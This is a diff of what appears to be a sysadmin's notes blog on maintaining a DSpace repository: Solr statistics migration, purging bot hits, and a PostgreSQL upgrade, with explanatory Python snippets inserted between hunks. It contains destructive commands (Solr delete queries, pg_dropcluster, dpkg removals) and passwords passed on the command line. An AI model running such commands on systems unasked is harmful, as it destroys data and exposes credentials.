      +$ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
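Purging core by core means repeating the same delete-by-query with only the core name changing. A minimal sketch of building those requests follows, assuming the same base URL as the commands above. The helper name `build_delete_request` is hypothetical, and nothing is sent to Solr here; the sketch only prints what would be posted.

```python
from xml.sax.saxutils import escape

# Same Solr base URL as in the curl commands above.
SOLR_BASE = "http://localhost:8081/solr"


def build_delete_request(core, query):
    """Return (url, xml_body) for a Solr delete-by-query against one core."""
    url = f"{SOLR_BASE}/{core}/update?softCommit=true"
    # Escape &, < and > so the query cannot break the XML envelope.
    body = f"<delete><query>{escape(query)}</query></delete>"
    return url, body


# The two cores named in the commands above; extend the list as needed.
for core in ["statistics-2015", "statistics-2014"]:
    url, body = build_delete_request(core, "dns:squeeze3.bronco.co.uk.")
    print(url)
    print(body)
```

Printing the requests first gives a chance to review them before running anything destructive against a production core.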
       
      • Deploy latest Tomcat and PostgreSQL JDBC driver changes on CGSpace (linode18)
      • Deploy latest 5_x-prod branch on CGSpace (linode18)
      • @@ -654,13 +654,13 @@ $ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=tru
      • I ran the dspace cleanup -v process on CGSpace and got an error:
      -
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      -  Detail: Key (bitstream_id)=(183996) is still referenced from table "bundle".
      +
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      +  Detail: Key (bitstream_id)=(183996) is still referenced from table "bundle".
       
      • The solution is, as always:
      # su - postgres
      -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
      +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
       UPDATE 1
       
      • Add one more new Bioversity ORCID iD to the controlled vocabulary on CGSpace
      • @@ -671,7 +671,7 @@ UPDATE 1
    -
    $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
    +
    $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
     
    • For some reason the Atmire Content and Usage Analysis (CUA) module’s Usage Statistics is drawing blank graphs
        @@ -708,7 +708,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
    -
    # grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
    +
    # grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
     dspace.log.2020-01-12:4
     dspace.log.2020-01-13:66
     dspace.log.2020-01-14:4
    @@ -724,25 +724,25 @@ dspace.log.2020-01-21:4
     
  • I deployed the fix on CGSpace (linode18) and I was able to see the graphs in the Atmire CUA Usage Statistics…
  • On an unrelated note, something weird is going on: I see millions of hits from IP 34.218.226.147 in Solr statistics. If I remember correctly, that IP belongs to CodeObia’s AReS explorer, which should only be using REST and therefore should not generate any Solr statistics…?
  • -
    $ curl -s "http://localhost:8081/solr/statistics-2018/select" -d "q=ip:34.218.226.147&rows=0"
    -<?xml version="1.0" encoding="UTF-8"?>
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/select" -d "q=ip:34.218.226.147&rows=0"
    +<?xml version="1.0" encoding="UTF-8"?>
     <response>
    -<lst name="responseHeader"><int name="status">0</int><int name="QTime">811</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="rows">0</str></lst></lst><result name="response" numFound="5536097" start="0"></result>
    +<lst name="responseHeader"><int name="status">0</int><int name="QTime">811</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="rows">0</str></lst></lst><result name="response" numFound="5536097" start="0"></result>
     </response>
     
    • And there are apparently two million from last month (2020-01):
    -
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=ip:34.218.226.147&fq=dateYearMonth:2020-01&rows=0"
    -<?xml version="1.0" encoding="UTF-8"?>
    +
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=ip:34.218.226.147&fq=dateYearMonth:2020-01&rows=0"
    +<?xml version="1.0" encoding="UTF-8"?>
     <response>
    -<lst name="responseHeader"><int name="status">0</int><int name="QTime">248</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="fq">dateYearMonth:2020-01</str><str name="rows">0</str></lst></lst><result name="response" numFound="2173455" start="0"></result>
    +<lst name="responseHeader"><int name="status">0</int><int name="QTime">248</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="fq">dateYearMonth:2020-01</str><str name="rows">0</str></lst></lst><result name="response" numFound="2173455" start="0"></result>
     </response>
     
    • But when I look at the nginx access logs for the past month or so I only see 84,000, all of which are on /rest and none of which are to XMLUI:
    # zcat /var/log/nginx/*.log.*.gz | grep -c 34.218.226.147
     84322
    -# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
    +# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
     84322
     
    • Either the requests didn’t get logged, or there is some mixup with the Solr documents (fuck!)
    @@ -758,13 +758,13 @@ dspace.log.2020-01-21:4
    • Anyways, I faceted by IP in 2020-01 and see:
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-01&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-01&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
     ...
    -        "172.104.229.92",2686876,
    -        "34.218.226.147",2173455,
    -        "163.172.70.248",80945,
    -        "163.172.71.24",55211,
    -        "163.172.68.99",38427,
    +        "172.104.229.92",2686876,
    +        "34.218.226.147",2173455,
    +        "163.172.70.248",80945,
    +        "163.172.71.24",55211,
    +        "163.172.68.99",38427,
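With `wt=json`, Solr returns each facet field as one flat list that alternates value and count, which is why the output above reads as IP, number, IP, number. A small sketch of turning that list into pairs, assuming the default flat layout; the function name `facet_counts` is hypothetical and the sample response is trimmed down to the three largest entries shown above.

```python
import json


def facet_counts(response_text, field):
    """Pair up Solr's flat [value, count, value, count, ...] facet list."""
    data = json.loads(response_text)
    flat = data["facet_counts"]["facet_fields"][field]
    # Even positions hold the facet values, odd positions hold the counts.
    return list(zip(flat[0::2], flat[1::2]))


# Trimmed, illustrative response holding only the facet section.
sample = json.dumps({
    "facet_counts": {"facet_fields": {"ip": [
        "172.104.229.92", 2686876,
        "34.218.226.147", 2173455,
        "163.172.70.248", 80945,
    ]}},
})

for ip, hits in facet_counts(sample, "ip"):
    print(f"{hits:>8} {ip}")
```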
     
    • Surprise surprise, the top two IPs are from AReS servers… wtf.
    • The next three are from Online in France and they are all using this weird user agent and making tens of thousands of requests to Discovery:
    • @@ -775,14 +775,14 @@ dspace.log.2020-01-21:4
    • I need to see why AReS harvesting is inflating the stats, as it should only be making REST requests…
    • Shiiiiit, I see 84,000 requests from the AReS IP today alone:
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&rows=0&wt=json&indent=true'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&rows=0&wt=json&indent=true'
     ...
    -  "response":{"numFound":84594,"start":0,"docs":[]
    +  "response":{"numFound":84594,"start":0,"docs":[]
     
    • Fuck! And of course the ILRI websites doing their daily REST harvesting are causing issues too, from today alone:
    -
            "2a01:7e00::f03c:91ff:fe9a:3a37",35512,
    -        "2a01:7e00::f03c:91ff:fe18:7396",26155,
    +
            "2a01:7e00::f03c:91ff:fe9a:3a37",35512,
    +        "2a01:7e00::f03c:91ff:fe18:7396",26155,
     
    • I need to try to make some requests for these URLs and observe if they make a statistics hit:
        @@ -793,12 +793,12 @@ dspace.log.2020-01-21:4
      • Those are the requests AReS and ILRI servers are making… nearly 150,000 per day!
      • Well that settles it!
      -
      $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      -  "response":{"numFound":12,"start":0,"docs":[
      -$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=82450'
      -$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
      -$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      -  "response":{"numFound":62,"start":0,"docs":[
      +
      $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      +  "response":{"numFound":12,"start":0,"docs":[
      +$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=82450'
      +$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
      +$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      +  "response":{"numFound":62,"start":0,"docs":[
       
      • A REST request with limit=50 will create exactly fifty statistics_type=view records in the Solr core (the count went from 12 to 62)… fuck.
          @@ -817,8 +817,8 @@ $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+s
        • I tried to add the IPs to our nginx IP bot mapping but it doesn’t seem to work… WTF, why is everything broken?!
        • Oh lord have mercy, the two AReS harvester IPs alone are responsible for 42 MILLION hits in 2019 and 2020 so far by themselves:
        -
        $ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&rows=0&wt=json&indent=true' | grep numFound
        -  "response":{"numFound":42395486,"start":0,"docs":[]
        +
        $ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&rows=0&wt=json&indent=true' | grep numFound
        +  "response":{"numFound":42395486,"start":0,"docs":[]
         
        • I modified my check-spider-hits.sh script to create a version that works with IPs and purged 47 million stats from Solr on CGSpace:
        @@ -856,7 +856,7 @@ Total number of bot hits purged: 5535399
    -
    add_header X-debug-message "ua is $ua" always;
    +
    add_header X-debug-message "ua is $ua" always;
     
    • Then in the HTTP response you see:
    @@ -966,7 +966,7 @@ Total number of bot hits purged: 2228
    • Then I purged about 200,000 Baidu hits from the 2015 to 2019 statistics cores with a few manual delete queries because they didn’t have a proper user agent and the only way to identify them was via DNS:
    -
    $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*crawl.baidu.com.</query></delete>"
    +
    $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*crawl.baidu.com.</query></delete>"
     
    • Jesus, the more I keep looking, the more I see ridiculous stuff…
    • In 2019 there were a few hundred thousand requests from CodeObia on Orange Jordan network…
    @@ -1024,7 +1024,7 @@ Total number of bot hits purged: 14110
    • Though looking in my REST logs for the last month I am second guessing my judgement on 45.5.186.2 because I see user agents like “Microsoft Office Word 2014”
    • Actually no, the overwhelming majority of these are coming from something harvesting the REST API with no user agent:
    -
    # zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\" '{print $6}' | sort | uniq -c | sort -h
    +
    # zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\" '{print $6}' | sort | uniq -c | sort -h
           1 Microsoft Office Word 2014
           1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office)
           1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    @@ -1038,10 +1038,10 @@ Total number of bot hits purged: 14110
     
    • I see lots of requests coming from the following user agents:
    -
    "Apache-HttpClient/4.5.7 (Java/11.0.3)"
    -"Apache-HttpClient/4.5.7 (Java/11.0.2)"
    -"LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)"
    -"EventMachine HttpClient"
    +
    "Apache-HttpClient/4.5.7 (Java/11.0.3)"
    +"Apache-HttpClient/4.5.7 (Java/11.0.2)"
    +"LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)"
    +"EventMachine HttpClient"
     
    • I should definitely add HttpClient to the bot user agents…
    • Also, while bot, spider, and crawl are in the pattern list already and can be used for case-insensitive matching when used by DSpace in Java, I can’t do case-insensitive matching in Solr with check-spider-hits.sh @@ -1171,7 +1171,7 @@ Total number of bot hits purged: 159
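One possible workaround for the missing case-insensitive matching is to expand each letter of a pattern into a two-letter character class, so that `bot` becomes `[Bb][Oo][Tt]`. The sketch below only shows that expansion; the helper name `case_insensitive_class` is hypothetical, and whether the expanded pattern behaves as intended in a particular Solr query is an assumption that would need testing against a real core.

```python
import re


def case_insensitive_class(word):
    """Expand cased letters into [Xx] classes, e.g. 'bot' -> '[Bb][Oo][Tt]'."""
    parts = []
    for ch in word:
        if ch.lower() != ch.upper():
            # A cased letter: accept both its upper and lower form.
            parts.append(f"[{ch.upper()}{ch.lower()}]")
        else:
            # Digits and punctuation: keep literal, escaping regex syntax.
            parts.append(re.escape(ch))
    return "".join(parts)


for word in ["bot", "spider", "crawl"]:
    print(case_insensitive_class(word))
```

Expanding every letter is more permissive than a first-letter-only class, at the cost of longer and less readable patterns.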
    • I tried to migrate the 2019 Solr statistics again on CGSpace because the automatic sharding failed last month:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
     $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-util.log.$(date --iso-8601)
     
    • Interestingly I saw this in the Solr log:
    • @@ -1186,7 +1186,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-ut
    • Manually create a core in the DSpace 6.4-SNAPSHOT instance on my local environment:
    -
    $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace63/solr/statistics&dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
    +
    $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace63/solr/statistics&dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
     
    • After that the statistics-2019 core was immediately available in the Solr UI, but after restarting Tomcat it was gone
        @@ -1195,7 +1195,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-ut
      • First export a small slice of 2019 stats from the main CGSpace statistics core, skipping Atmire schema additions:
      -
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
      +
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
       
      • Then import into my local statistics core:
      @@ -1226,8 +1226,8 @@ Moving: 21993 into core statistics-2019
    -
    <meta content="Thu hoạch v&agrave; bảo quản c&agrave; ph&ecirc; ch&egrave; đ&uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)" name="citation_title">
    -<meta name="citation_title" content="Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)" />
    +
    <meta content="Thu hoạch v&agrave; bảo quản c&agrave; ph&ecirc; ch&egrave; đ&uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)" name="citation_title">
    +<meta name="citation_title" content="Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)" />
     
    diff --git a/docs/2020-03/index.html b/docs/2020-03/index.html
    index e4204b42e..7e9d57504 100644
    --- a/docs/2020-03/index.html
    +++ b/docs/2020-03/index.html
    @@ -42,7 +42,7 @@ You need to download this into the DSpace 6.x source and compile it
     "/>
    -
    +
    @@ -141,7 +141,7 @@ You need to download this into the DSpace 6.x source and compile it
    -
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
     $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
     

    2020-03-03

      @@ -160,7 +160,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
    -
    $ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
    +
    $ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
     
    • But I have not run it on CGSpace yet because we want to ask Peter if he is sure about it…
    • Send a message to Macaroni Bros to ask them about their Drupal module and its readiness for DSpace 6 UUIDs
    • @@ -179,16 +179,16 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
    $ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o /tmp/statistics-2010.json -k uid
     $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2010.json -k uid
    -$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2010*</query></delete>"
    +$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2010*</query></delete>"
     $ ./run.sh -s http://localhost:8081/solr/statistics-2011 -a export -o /tmp/statistics-2011.json -k uid
     $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2011.json -k uid
    -$ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2011*</query></delete>"
    +$ curl -s "http://localhost:8081/solr/statistics-2011/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2011*</query></delete>"
     $ ./run.sh -s http://localhost:8081/solr/statistics -a import -o /tmp/statistics-2012.json -k uid
    -$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    -  "response":{"numFound":3761989,"start":0,"docs":[]
    -$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    -  "response":{"numFound":3761989,"start":0,"docs":[]
    -$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2012*</query></delete>"
    +$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    +  "response":{"numFound":3761989,"start":0,"docs":[]
    +$ curl -s 'http://localhost:8081/solr/statistics-2012/select?q=time:2012*&rows=0&wt=json&indent=true' | grep numFound
    +  "response":{"numFound":3761989,"start":0,"docs":[]
    +$ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>time:2012*</query></delete>"
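The 2012 sequence above compares `numFound` in the main core and in the yearly core before deleting anything. A minimal sketch of that comparison follows, assuming full JSON responses from the two `select` queries are available as strings. The function names `num_found` and `safe_to_delete` are hypothetical, and the sample strings are reduced to the `response` object only.

```python
import json


def num_found(response_text):
    """Extract numFound from a Solr select response in JSON format."""
    return json.loads(response_text)["response"]["numFound"]


def safe_to_delete(source_response, target_response):
    """True only when both cores report the same non-zero document count."""
    source = num_found(source_response)
    target = num_found(target_response)
    return source > 0 and source == target


# Reduced responses using the count reported above for time:2012*.
yearly_core = '{"response":{"numFound":3761989,"start":0,"docs":[]}}'
main_core = '{"response":{"numFound":3761989,"start":0,"docs":[]}}'

print(safe_to_delete(yearly_core, main_core))
```

Requiring a non-zero count guards against the case where both queries silently match nothing, which would otherwise look like a successful migration.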
     
    • I will do this for as many cores as I can (disk space limited) and then monitor the effect on the system and JVM memory usage
        @@ -196,7 +196,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
    -
    $ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
    +
    $ ./run.sh -s http://localhost:8081/solr/statistics-2014 -a export -o /tmp/statistics-2014-1.json -k uid -f 'time:/2014-0[1-6].*/'
     
    • Upgrade PostgreSQL from 9.6 to 10 on DSpace Test (linode19)
        @@ -213,7 +213,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
         # pg_dropcluster 10 main
         # pg_upgradecluster 9.6 main
         # pg_dropcluster 9.6 main
        -# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
        +# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r

    2020-03-09

    • Peter noticed that the Solr stats were not showing anything before 2020
    @@ -250,7 +250,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
    • In Solr the IP is 127.0.0.1, but in the nginx logs I can luckily see the real IP (64.225.40.66), which is on Digital Ocean
    • I will purge them from Solr statistics:
    -
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"</query></delete>'
     
    • Another user agent that seems to be a bot is:
    @@ -258,14 +258,14 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
    • In Solr the IP is 127.0.0.1 because of the misconfiguration, but in nginx’s logs I see it belongs to three IPs on Online.net in France:
    -
    # zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
    +
    # zcat /var/log/nginx/access.log.*.gz /var/log/nginx/rest.log.*.gz | grep 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' | awk '{print $1}' | sort | uniq -c
       63090 163.172.68.99
      183428 163.172.70.248
      147608 163.172.71.24
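The `grep | awk '{print $1}' | sort | uniq -c` pipeline above is a per-IP tally of log lines carrying one user agent. The same idea can be sketched in Python with a `Counter`. The function name `count_ips` and the sample log lines are made up for illustration and only mimic the shape of an nginx access log line, with the client IP as the first field.

```python
from collections import Counter

USER_AGENT = "Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)"


def count_ips(lines, user_agent):
    """Count requests per client IP among lines containing user_agent."""
    counts = Counter()
    for line in lines:
        if user_agent in line:
            # First whitespace-separated field, like awk '{print $1}'.
            counts[line.split()[0]] += 1
    return counts


# Made-up sample lines; real input would come from the rotated nginx logs.
sample_lines = [
    f'163.172.68.99 - - [09/Mar/2020:10:00:00 +0100] "GET /discover HTTP/1.1" 200 1234 "-" "{USER_AGENT}"',
    f'163.172.70.248 - - [09/Mar/2020:10:00:01 +0100] "GET /discover HTTP/1.1" 200 1234 "-" "{USER_AGENT}"',
    f'163.172.68.99 - - [09/Mar/2020:10:00:02 +0100] "GET /discover HTTP/1.1" 200 1234 "-" "{USER_AGENT}"',
    '203.0.113.7 - - [09/Mar/2020:10:00:03 +0100] "GET / HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

for ip, hits in count_ips(sample_lines, USER_AGENT).most_common():
    print(f"{hits:>7} {ip}")
```

Matching on a plain substring rather than a regular expression avoids having to think about how the doubled parenthesis in this user agent would be interpreted.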
     
    • It is making 10,000 to 40,000 requests to XMLUI per day…
    -
    # zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
    +
    # zgrep -c 'Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)' /var/log/nginx/access.log.{1..9}
     /var/log/nginx/access.log.30.gz:18687
     /var/log/nginx/access.log.31.gz:28936
     /var/log/nginx/access.log.32.gz:36402
    @@ -284,7 +284,7 @@ $ curl -s "http://localhost:8081/solr/statistics-2012/update?softCommit=tru
     
    • I will purge those hits too!
    -
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)"</query></delete>'
    +
    $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>userAgent:"Mozilla/5.0 ((Windows; U; Windows NT 6.1; fr; rv:1.9.2) Gecko/20100115 Firefox/3.6)"</query></delete>'
     
    • Shit, and something happened and a few thousand hits from user agents with “Bot” in their user agent got through
        @@ -348,7 +348,7 @@ Purging 62 hits from [Ss]pider in statistics
      dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2020-03-12-affiliations.csv WITH CSV HEADER;
       dspace=# \q
      -$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' > /tmp/affiliations.csv
      +$ csvcut -l -c 0 /tmp/2020-03-12-affiliations.csv | sed -e 's/^line_number/id/' -e 's/text_value/name/' > /tmp/affiliations.csv
       $ lein run /tmp/affiliations.csv name id
       
      • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)
      • @@ -417,7 +417,7 @@ $ lein run /tmp/affiliations.csv name id
      • Update Tomcat to version 7.0.103 in the Ansible infrastructure playbooks and deploy on DSpace Test (linode26)
      • Maria sent me a few new ORCID identifiers from Bioversity so I combined them with our existing ones, filtered the unique ones, and then resolved their names using my resolve-orcids.py script:
      -
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-03-26-combined-orcids.txt
      +
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcids | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-03-26-combined-orcids.txt
       $ ./resolve-orcids.py -i /tmp/2020-03-26-combined-orcids.txt -o /tmp/2020-03-26-combined-names.txt -d
       # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
       $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
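The extract-and-deduplicate step in the pipeline above can also be sketched in Python. This is only an illustration: the pattern is the same one passed to `grep -oE`, while the function name `extract_unique_orcids` and the sample text are hypothetical and not taken from the real vocabulary file.

```python
import re

# Same pattern as the grep -oE expression in the shell pipeline
ORCID_PATTERN = re.compile(r"[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}")


def extract_unique_orcids(text: str) -> list[str]:
    """Return the sorted, de-duplicated ORCID iDs found in text."""
    return sorted(set(ORCID_PATTERN.findall(text)))


# Hypothetical input: one iD appears twice, one appears once
sample = """
Brian King: 0000-0002-7056-9214
Beatrice Ekesa: 0000-0002-2630-258X
Beatrice Ekesa: 0000-0002-2630-258X
"""

unique_orcids = extract_unique_orcids(sample)
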